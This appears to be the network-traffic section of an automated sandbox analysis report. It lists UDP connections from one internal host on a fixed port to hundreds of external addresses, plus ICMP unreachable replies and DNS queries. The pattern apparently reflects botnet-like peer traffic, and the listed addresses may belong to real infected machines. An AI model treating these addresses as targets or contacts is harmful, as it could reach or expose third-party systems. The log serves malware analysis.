                                                                                                          Jan 6, 2021 19:31:36.896507978 CET285376881192.168.2.2087.98.162.88
                                                                                                          Jan 6, 2021 19:31:36.897938967 CET68812853787.98.162.88192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.898870945 CET2853750590192.168.2.20198.37.227.146
                                                                                                          Jan 6, 2021 19:31:36.912580013 CET688128537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.912811995 CET688128537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.912945032 CET285376881192.168.2.2087.98.162.88
                                                                                                          Jan 6, 2021 19:31:36.913074970 CET285376881192.168.2.2087.98.162.88
                                                                                                          Jan 6, 2021 19:31:36.928155899 CET68812853767.215.246.10192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.928466082 CET285376881192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:36.928688049 CET68812853787.98.162.88192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.929260015 CET2853750590192.168.2.20198.37.227.146
                                                                                                          Jan 6, 2021 19:31:36.933000088 CET68812853782.221.103.244192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.933218002 CET285376881192.168.2.2087.98.162.88
                                                                                                          Jan 6, 2021 19:31:36.949531078 CET68812853787.98.162.88192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.950236082 CET2853750590192.168.2.20198.37.227.146
                                                                                                          Jan 6, 2021 19:31:36.965857983 CET68812853787.98.162.88192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.965924978 CET68812853787.98.162.88192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.968075037 CET2853750590192.168.2.20198.37.227.146
                                                                                                          Jan 6, 2021 19:31:36.969336033 CET2853750590192.168.2.20198.37.227.146
                                                                                                          Jan 6, 2021 19:31:36.985896111 CET68812853787.98.162.88192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.986371040 CET2853750590192.168.2.20198.37.227.146
                                                                                                          Jan 6, 2021 19:31:36.998343945 CET688128537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.998917103 CET2853751413192.168.2.205.135.183.57
                                                                                                          Jan 6, 2021 19:31:37.438515902 CET285378744192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:37.505867958 CET285378723192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:37.508493900 CET874428537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:37.509015083 CET2853754110192.168.2.20176.113.161.84
                                                                                                          Jan 6, 2021 19:31:37.575892925 CET872328537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:37.580465078 CET2853744822192.168.2.2094.19.84.187
                                                                                                          Jan 6, 2021 19:31:37.630429029 CET285378547192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:37.700440884 CET854728537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:37.701725960 CET2853730301192.168.2.20217.211.51.143
                                                                                                          Jan 6, 2021 19:31:38.529130936 CET285371900192.168.2.20178.141.218.127
                                                                                                          Jan 6, 2021 19:31:39.096730947 CET285378646192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:39.166646957 CET864628537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:39.167980909 CET2853735923192.168.2.20210.180.237.212
                                                                                                          Jan 6, 2021 19:31:39.462642908 CET3592328537210.180.237.212192.168.2.20
                                                                                                          Jan 6, 2021 19:31:39.463476896 CET285378003192.168.2.2059.92.218.209
                                                                                                          Jan 6, 2021 19:31:39.664235115 CET80032853759.92.218.209192.168.2.20
                                                                                                          Jan 6, 2021 19:31:39.774185896 CET285379085192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:39.788343906 CET285378763192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:39.844593048 CET908528537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:39.845556974 CET2853711211192.168.2.2095.88.158.132
                                                                                                          Jan 6, 2021 19:31:39.858230114 CET876328537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:39.859441042 CET2853711211192.168.2.20178.141.122.111
                                                                                                          Jan 6, 2021 19:31:40.757564068 CET285378857192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:40.827503920 CET885728537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:40.828263998 CET2853744790192.168.2.20185.246.176.157
                                                                                                          Jan 6, 2021 19:31:41.013478041 CET4479028537185.246.176.157192.168.2.20
                                                                                                          Jan 6, 2021 19:31:41.271074057 CET285378606192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:41.341032982 CET860628537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:41.341967106 CET2853711211192.168.2.2085.106.8.102
                                                                                                          Jan 6, 2021 19:31:41.706690073 CET112112853785.106.8.102192.168.2.20
                                                                                                          Jan 6, 2021 19:31:41.793448925 CET285378700192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:41.868362904 CET870028537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:41.869664907 CET285371900192.168.2.20178.141.74.98
                                                                                                          Jan 6, 2021 19:31:41.958612919 CET190028537178.141.74.98192.168.2.20
                                                                                                          Jan 6, 2021 19:31:42.071003914 CET285371900192.168.2.20140.143.227.62
                                                                                                          Jan 6, 2021 19:31:42.682499886 CET2853765192192.168.2.20217.23.79.14
                                                                                                          Jan 6, 2021 19:31:43.400262117 CET285378896192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:43.470293045 CET889628537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:43.471159935 CET2853747224192.168.2.20217.79.178.72
                                                                                                          Jan 6, 2021 19:31:44.163314104 CET285378000192.168.2.20178.141.79.177
                                                                                                          Jan 6, 2021 19:31:44.238826036 CET285371254192.168.2.20176.113.161.64
                                                                                                          Jan 6, 2021 19:31:44.374134064 CET125428537176.113.161.64192.168.2.20
                                                                                                          Jan 6, 2021 19:31:44.375092983 CET2853751999192.168.2.2059.92.217.123
                                                                                                          Jan 6, 2021 19:31:44.543962955 CET800028537178.141.79.177192.168.2.20
                                                                                                          Jan 6, 2021 19:31:44.544858932 CET2853737649192.168.2.20117.247.205.93
                                                                                                          Jan 6, 2021 19:31:44.755512953 CET3764928537117.247.205.93192.168.2.20
                                                                                                          Jan 6, 2021 19:31:44.756422043 CET2853741682192.168.2.2058.97.206.33
                                                                                                          Jan 6, 2021 19:31:44.989984989 CET285378559192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:45.060028076 CET855928537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:45.060899019 CET2853751413192.168.2.2037.46.229.101
                                                                                                          Jan 6, 2021 19:31:45.178462982 CET416822853758.97.206.33192.168.2.20
                                                                                                          Jan 6, 2021 19:31:45.425415993 CET285378978192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:45.496097088 CET897828537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:45.496937037 CET285371900192.168.2.20178.141.70.255
                                                                                                          Jan 6, 2021 19:31:45.586049080 CET190028537178.141.70.255192.168.2.20
                                                                                                          Jan 6, 2021 19:31:45.586941957 CET2853711211192.168.2.20200.52.228.17
                                                                                                          Jan 6, 2021 19:31:45.826566935 CET1121128537200.52.228.17192.168.2.20
                                                                                                          Jan 6, 2021 19:31:45.828005075 CET2853741916192.168.2.20111.92.80.127
                                                                                                          Jan 6, 2021 19:31:45.876033068 CET2853736530192.168.2.2098.128.228.218
                                                                                                          Jan 6, 2021 19:31:46.024624109 CET4191628537111.92.80.127192.168.2.20
                                                                                                          Jan 6, 2021 19:31:46.025484085 CET2853713072192.168.2.20117.202.65.25
                                                                                                          Jan 6, 2021 19:31:46.088613033 CET285378623192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:46.158556938 CET862328537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:46.159447908 CET2853751448192.168.2.205.189.185.57
                                                                                                          Jan 6, 2021 19:31:46.243149042 CET1307228537117.202.65.25192.168.2.20
                                                                                                          Jan 6, 2021 19:31:46.244071007 CET285378083192.168.2.20220.124.130.66
                                                                                                          Jan 6, 2021 19:31:46.550404072 CET285378780192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:46.620377064 CET878028537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:46.621232033 CET285375461192.168.2.20101.0.34.180
                                                                                                          Jan 6, 2021 19:31:46.627203941 CET808328537220.124.130.66192.168.2.20
                                                                                                          Jan 6, 2021 19:31:46.766196966 CET285371900192.168.2.20178.141.218.127
                                                                                                          Jan 6, 2021 19:31:46.937099934 CET190028537178.141.218.127192.168.2.20
                                                                                                          Jan 6, 2021 19:31:46.939234018 CET2853723826192.168.2.20121.61.97.133
                                                                                                          Jan 6, 2021 19:31:46.989105940 CET546128537101.0.34.180192.168.2.20
                                                                                                          Jan 6, 2021 19:31:46.990026951 CET2853731921192.168.2.20111.92.80.183
                                                                                                          Jan 6, 2021 19:31:47.149734974 CET285378735192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:47.219669104 CET873528537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:47.220496893 CET285378081192.168.2.20178.141.20.255
                                                                                                          Jan 6, 2021 19:31:47.611157894 CET3192128537111.92.80.183192.168.2.20
                                                                                                          Jan 6, 2021 19:31:47.737560034 CET285378706192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:47.807491064 CET870628537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:47.827389956 CET2853736530192.168.2.2098.128.228.218
                                                                                                          Jan 6, 2021 19:31:48.099236012 CET285378792192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:48.169203043 CET879228537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:48.170104980 CET2853722388192.168.2.2090.12.133.168
                                                                                                          Jan 6, 2021 19:31:48.423949003 CET2853711211192.168.2.2095.88.158.132
                                                                                                          Jan 6, 2021 19:31:48.712053061 CET2853730301192.168.2.20178.141.224.194
                                                                                                          Jan 6, 2021 19:31:49.224442005 CET285379031192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:49.296788931 CET903128537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:31:49.297640085 CET285378082192.168.2.20186.33.104.116
                                                                                                          Jan 6, 2021 19:31:49.610692024 CET2853720573192.168.2.20122.14.200.208
                                                                                                          Jan 6, 2021 19:31:50.035525084 CET285377090192.168.2.2078.72.231.120
                                                                                                          Jan 6, 2021 19:31:50.143635988 CET285379144192.168.2.20125.74.28.200
                                                                                                          Jan 6, 2021 19:31:50.776346922 CET2853741112192.168.2.2085.197.177.204
                                                                                                          Jan 6, 2021 19:31:50.843696117 CET808228537186.33.104.116192.168.2.20
                                                                                                          Jan 6, 2021 19:31:50.844265938 CET285373718192.168.2.20178.72.69.188
                                                                                                          Jan 6, 2021 19:31:51.569700003 CET285378082192.168.2.2014.46.31.88
                                                                                                          Jan 6, 2021 19:31:51.908243895 CET285371452192.168.2.20178.141.150.90
                                                                                                          Jan 6, 2021 19:31:52.323745012 CET285376881192.168.2.2079.138.25.68
                                                                                                          Jan 6, 2021 19:31:52.468416929 CET80822853714.46.31.88192.168.2.20
                                                                                                          Jan 6, 2021 19:31:52.481734037 CET3764928537117.247.205.93192.168.2.20
                                                                                                          Jan 6, 2021 19:31:52.592091084 CET2853715215192.168.2.20113.20.107.142
                                                                                                          Jan 6, 2021 19:31:52.592981100 CET2853737649192.168.2.20117.247.205.93
                                                                                                          Jan 6, 2021 19:31:52.593096972 CET285378081192.168.2.20173.63.104.87
                                                                                                          Jan 6, 2021 19:31:55.048415899 CET285371027192.168.2.20178.141.154.96
                                                                                                          Jan 6, 2021 19:32:08.798796892 CET2853713262192.168.2.20178.141.53.219
                                                                                                          Jan 6, 2021 19:32:09.093492031 CET1326228537178.141.53.219192.168.2.20
                                                                                                          Jan 6, 2021 19:32:09.094295979 CET2853731404192.168.2.205.189.187.90
                                                                                                          Jan 6, 2021 19:32:29.812975883 CET285376942192.168.2.20173.212.202.22
                                                                                                          Jan 6, 2021 19:32:51.165745020 CET285378549192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:32:51.235661030 CET854928537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:32:51.236910105 CET2853724814192.168.2.2041.33.13.26
                                                                                                          Jan 6, 2021 19:33:17.175236940 CET285371900192.168.2.20178.141.74.98
                                                                                                          Jan 6, 2021 19:33:17.265319109 CET190028537178.141.74.98192.168.2.20
                                                                                                          Jan 6, 2021 19:33:17.266349077 CET285376847192.168.2.20173.212.205.4
                                                                                                          Jan 6, 2021 19:33:22.183502913 CET285378926192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:33:22.253539085 CET892628537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:33:22.254709959 CET285378700192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:33:22.324691057 CET870028537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:33:22.325274944 CET285378082192.168.2.2046.47.80.188
                                                                                                          Jan 6, 2021 19:33:22.404701948 CET80822853746.47.80.188192.168.2.20
                                                                                                          Jan 6, 2021 19:33:22.405731916 CET2853747224192.168.2.20217.79.178.72
                                                                                                          Jan 6, 2021 19:33:22.455981016 CET4722428537217.79.178.72192.168.2.20
                                                                                                          Jan 6, 2021 19:33:22.457918882 CET285378673192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:33:22.527846098 CET867328537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:33:22.529145002 CET2853725048192.168.2.20178.141.28.159
                                                                                                          Jan 6, 2021 19:33:27.472735882 CET285377049192.168.2.20202.164.139.21
                                                                                                          Jan 6, 2021 19:33:27.668049097 CET704928537202.164.139.21192.168.2.20
                                                                                                          Jan 6, 2021 19:33:27.754555941 CET285378944192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:33:27.824626923 CET894428537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:33:27.825161934 CET285378978192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:33:27.895092964 CET897828537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:33:27.896672010 CET2853711211192.168.2.20178.141.136.33
                                                                                                          Jan 6, 2021 19:33:28.053347111 CET1121128537178.141.136.33192.168.2.20
                                                                                                          Jan 6, 2021 19:33:28.054248095 CET2853715562192.168.2.20202.164.139.94
                                                                                                          Jan 6, 2021 19:33:28.247570992 CET1556228537202.164.139.94192.168.2.20
                                                                                                          Jan 6, 2021 19:33:28.248460054 CET285378803192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:33:28.318334103 CET880328537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:33:28.319174051 CET2853757065192.168.2.2069.92.67.36
                                                                                                          Jan 6, 2021 19:33:29.023545980 CET570652853769.92.67.36192.168.2.20
                                                                                                          Jan 6, 2021 19:33:29.142498970 CET285371900192.168.2.20120.194.87.237
                                                                                                          Jan 6, 2021 19:33:32.185658932 CET2853759466192.168.2.2061.62.47.29
                                                                                                          Jan 6, 2021 19:33:32.566138983 CET594662853761.62.47.29192.168.2.20
                                                                                                          Jan 6, 2021 19:33:32.566976070 CET2853711211192.168.2.20178.141.122.111
                                                                                                          Jan 6, 2021 19:33:43.144288063 CET285371027192.168.2.2084.240.58.142
                                                                                                          Jan 6, 2021 19:33:43.218626976 CET10272853784.240.58.142192.168.2.20
                                                                                                          Jan 6, 2021 19:33:43.219547033 CET2853745563192.168.2.20202.164.139.181
                                                                                                          Jan 6, 2021 19:33:43.428563118 CET4556328537202.164.139.181192.168.2.20
                                                                                                          Jan 6, 2021 19:33:43.533529043 CET285378082192.168.2.2069.176.89.119
                                                                                                          Jan 6, 2021 19:33:49.456758022 CET285378648192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:33:49.526966095 CET864828537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:33:49.527864933 CET285379085192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:33:49.597897053 CET908528537130.239.18.159192.168.2.20
                                                                                                          Jan 6, 2021 19:33:49.598771095 CET285371434192.168.2.20112.78.1.134
                                                                                                          Jan 6, 2021 19:34:08.297601938 CET2853713183192.168.2.20134.175.133.109
                                                                                                          Jan 6, 2021 19:34:31.460891008 CET2853720928192.168.2.20103.31.251.58
                                                                                                          Jan 6, 2021 19:35:00.344808102 CET3420853192.168.2.208.8.8.8
                                                                                                          Jan 6, 2021 19:35:00.344899893 CET5539053192.168.2.208.8.8.8
                                                                                                          Jan 6, 2021 19:35:00.395486116 CET53342088.8.8.8192.168.2.20
                                                                                                          Jan 6, 2021 19:35:00.395517111 CET53553908.8.8.8192.168.2.20
                                                                                                          Jan 6, 2021 19:35:01.252167940 CET285373627192.168.2.20108.60.219.24

                                                                                                          ICMP Packets

                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                          Jan 6, 2021 19:31:16.017956972 CET134.58.253.43192.168.2.2028c7(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:16.022233009 CET185.189.124.1192.168.2.20dcfb(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:16.097773075 CET38.126.144.18192.168.2.20c587(Net unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:17.165091991 CET64.59.147.234192.168.2.207d1(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:22.421299934 CET111.118.1.34192.168.2.20b66c(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:25.010957003 CET10.7.145.191192.168.2.207831(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:25.018260002 CET217.247.205.165192.168.2.20a51b(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:25.034020901 CET78.77.181.70192.168.2.204e1(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:25.042280912 CET193.8.201.1192.168.2.2049d7(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:25.042506933 CET92.86.244.254192.168.2.2053e8(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:25.073118925 CET89.222.201.34192.168.2.204a3e(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:25.140449047 CET194.166.99.241192.168.2.20e66b(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:25.142987013 CET91.248.64.225192.168.2.20afdf(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:25.214121103 CET177.185.2.147192.168.2.20249e(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:25.259771109 CET161.31.0.30192.168.2.20f3a0(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:25.278211117 CET96.2.68.189192.168.2.206493(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:25.338251114 CET192.168.3.34192.168.2.201242(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:27.743357897 CET155.133.140.7192.168.2.2036a2(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:28.166759968 CET98.218.86.82192.168.2.20c40a(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:29.366172075 CET103.253.208.202192.168.2.202926(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:32.454982042 CET100.72.250.150192.168.2.20426f(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:33.924706936 CET147.97.27.145192.168.2.20938c(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:35.457931995 CET100.72.250.150192.168.2.20426f(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:36.196664095 CET81.228.95.181192.168.2.20c354(Net unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:36.287797928 CET192.168.35.130192.168.2.20d273(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:36.348934889 CET197.234.74.25192.168.2.20aa3a(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:36.373511076 CET10.10.76.13192.168.2.201aff(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:36.380707979 CET10.6.2.1192.168.2.20d609(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:36.420351982 CET168.95.22.153192.168.2.20d2b4(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:36.860964060 CET147.97.27.145192.168.2.20938c(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:39.250956059 CET217.198.241.130192.168.2.20de24(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:39.250988007 CET217.198.241.130192.168.2.20de24(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:39.251003981 CET217.198.241.130192.168.2.20de24(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:44.367494106 CET169.255.216.50192.168.2.204ad9(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:46.403183937 CET179.60.135.131192.168.2.20faa9(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:46.403212070 CET179.60.135.131192.168.2.20faa9(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:49.407814026 CET179.60.135.131192.168.2.20faa9(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:52.472949028 CET62.39.248.1192.168.2.2083a0(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:53.268167973 CET24.124.226.154192.168.2.20d9f8(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:53.430530071 CET10.63.129.146192.168.2.20a4ef(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:53.430565119 CET10.63.129.146192.168.2.20a4ef(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:57.167315960 CET149.11.89.129192.168.2.20371(Net unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:31:57.349855900 CET202.73.96.26192.168.2.20fd19(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:31:58.173613071 CET149.11.89.129192.168.2.202413(Net unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:00.231442928 CET80.80.255.99192.168.2.20c87b(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:32:04.209445953 CET80.101.88.85192.168.2.20a251(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:05.384128094 CET185.16.37.4192.168.2.20578a(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:32:07.346611023 CET85.185.211.1192.168.2.208ca4(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:07.346648932 CET85.185.211.1192.168.2.208ca4(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:07.346659899 CET85.185.211.1192.168.2.208ca4(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:07.417709112 CET172.16.6.189192.168.2.20a062(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:11.264178991 CET145.125.0.17192.168.2.20c485(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:11.295073032 CET103.145.9.254192.168.2.208f6f(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:32:12.515289068 CET201.6.73.34192.168.2.2090fd(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:14.219207048 CET2.45.82.213192.168.2.2014ec(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:14.219228983 CET2.45.82.213192.168.2.2014ec(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:14.341219902 CET63.224.11.110192.168.2.20b35(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:14.341285944 CET63.224.11.110192.168.2.20b35(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:14.341530085 CET63.224.11.110192.168.2.20b35(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:14.630420923 CET39.109.182.132192.168.2.209dd9(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:15.277038097 CET172.242.65.250192.168.2.20aed6(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:15.357976913 CET172.242.65.250192.168.2.20aece(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:15.396898985 CET172.242.65.250192.168.2.20aece(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:17.220911980 CET2.45.82.213192.168.2.2014ec(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:18.189579964 CET217.232.198.189192.168.2.207e2a(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:18.319674015 CET174.58.192.2192.168.2.2066cf(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:18.534116030 CET24.229.52.33192.168.2.20ce8(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:18.534136057 CET24.229.52.33192.168.2.20ce8(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:20.316781044 CET172.242.65.250192.168.2.20aece(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:21.407489061 CET172.29.255.227192.168.2.2089ea(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:32:21.534038067 CET24.229.52.33192.168.2.20ce8(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:23.478913069 CET95.90.228.207192.168.2.20a515(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:23.783056974 CET184.104.205.170192.168.2.20aaa5(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:25.185755014 CET91.34.62.97192.168.2.20e75d(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:25.188405991 CET87.48.154.10192.168.2.205b52(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:32:25.201318979 CET93.233.121.196192.168.2.20fad2(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:25.386025906 CET69.59.210.153192.168.2.203a3b(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:32:26.428149939 CET165.233.231.5192.168.2.20bb8b(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:32:28.323113918 CET128.32.0.101192.168.2.20b4c(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:28.323156118 CET128.32.0.101192.168.2.20b4c(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:28.525872946 CET103.126.52.162192.168.2.207c59(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:28.525897026 CET103.126.52.162192.168.2.207c59(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:28.525907040 CET103.126.52.162192.168.2.207c59(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:31.327101946 CET128.32.0.101192.168.2.20b4c(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:32.341322899 CET158.165.7.160192.168.2.20d299(Net unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:35.397326946 CET211.180.27.182192.168.2.20ad48(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:35.397351980 CET211.180.27.182192.168.2.20ad48(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:35.423949003 CET50.67.62.123192.168.2.2030a6(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:38.398207903 CET211.180.27.182192.168.2.20ad48(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:39.200187922 CET62.158.215.92192.168.2.20e4ae(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:39.335378885 CET107.179.56.165192.168.2.206440(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:39.348706961 CET58.65.240.14192.168.2.20a2e0(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:32:39.383860111 CET83.84.84.186192.168.2.2067f8(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:42.404164076 CET172.249.219.236192.168.2.202508(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:42.408637047 CET172.249.219.236192.168.2.202508(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:46.236865044 CET217.231.181.161192.168.2.208d58(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:52.218978882 CET185.43.204.129192.168.2.2071d4(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:52.219007969 CET185.43.204.129192.168.2.2071d4(Host unreachable)Destination Unreachable
